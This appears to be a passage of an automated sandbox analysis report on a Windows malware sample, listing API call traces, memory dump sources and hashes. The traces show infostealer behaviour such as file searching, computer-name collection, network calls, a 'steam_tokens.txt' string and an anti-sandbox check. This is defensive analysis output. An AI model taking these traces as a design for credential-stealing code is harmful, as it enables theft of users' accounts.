                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                                                                                                • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                                                                                                • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                              • String ID: 00A
                                                                                                                                                                                                                              • API String ID: 2104210347-95910775
                                                                                                                                                                                                                              • Opcode ID: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
                                                                                                                                                                                                                              • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BB73095
                                                                                                                                                                                                                                • Part of subcall function 6BB735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BBFF688,00001000), ref: 6BB735D5
                                                                                                                                                                                                                                • Part of subcall function 6BB735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BB735E0
                                                                                                                                                                                                                                • Part of subcall function 6BB735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BB735FD
                                                                                                                                                                                                                                • Part of subcall function 6BB735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BB7363F
                                                                                                                                                                                                                                • Part of subcall function 6BB735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BB7369F
                                                                                                                                                                                                                                • Part of subcall function 6BB735A0: __aulldiv.LIBCMT ref: 6BB736E4
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BB7309F
                                                                                                                                                                                                                                • Part of subcall function 6BB95B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BB956EE,?,00000001), ref: 6BB95B85
                                                                                                                                                                                                                                • Part of subcall function 6BB95B50: EnterCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95B90
                                                                                                                                                                                                                                • Part of subcall function 6BB95B50: LeaveCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95BD8
                                                                                                                                                                                                                                • Part of subcall function 6BB95B50: GetTickCount64.KERNEL32 ref: 6BB95BE4
                                                                                                                                                                                                                              • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BB730BE
                                                                                                                                                                                                                                • Part of subcall function 6BB730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BB73127
                                                                                                                                                                                                                                • Part of subcall function 6BB730F0: __aulldiv.LIBCMT ref: 6BB73140
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB2A: __onexit.LIBCMT ref: 6BBAAB30
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4291168024-0
                                                                                                                                                                                                                              • Opcode ID: 3d6a04998aaf35f4bef9bd0303c2721d12223f34602f1ea4cdb55f0935ce29e1
                                                                                                                                                                                                                              • Instruction ID: 39d4cced4036cd185580ed9add6c159bf0b856922a77cce1195dda84c1b9a55a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d6a04998aaf35f4bef9bd0303c2721d12223f34602f1ea4cdb55f0935ce29e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F02D32C25788A7CB20EFB4A8425BE7368EF6B214F505329E85457151FF22E1D4C396
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                                              • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                              • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                              • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                              • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1103761159-0
                                                                                                                                                                                                                              • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                              • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3409980764-0
                                                                                                                                                                                                                              • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                              • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                                                                                              • String ID: steam_tokens.txt
                                                                                                                                                                                                                              • API String ID: 2934705399-401951677
                                                                                                                                                                                                                              • Opcode ID: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
                                                                                                                                                                                                                              • Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                              • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                              • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 574041509-0
                                                                                                                                                                                                                              • Opcode ID: 00a59568e6e8dee021ac523680588fe9d21208a39996b7a3fc61866b91fea596
                                                                                                                                                                                                                              • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00a59568e6e8dee021ac523680588fe9d21208a39996b7a3fc61866b91fea596
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3635112192-0
                                                                                                                                                                                                                              • Opcode ID: d60d012d099394867fd0c3f982d7f580b869e45677e5243acd2df46991eb4bfd
                                                                                                                                                                                                                              • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d60d012d099394867fd0c3f982d7f580b869e45677e5243acd2df46991eb4bfd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3635112192-0
                                                                                                                                                                                                                              • Opcode ID: 55d8cf1ee5e3191f301125c61a170fc330e59dd08e6a8f50685c6e9e78580fbd
                                                                                                                                                                                                                              • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55d8cf1ee5e3191f301125c61a170fc330e59dd08e6a8f50685c6e9e78580fbd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                              Uniqueness

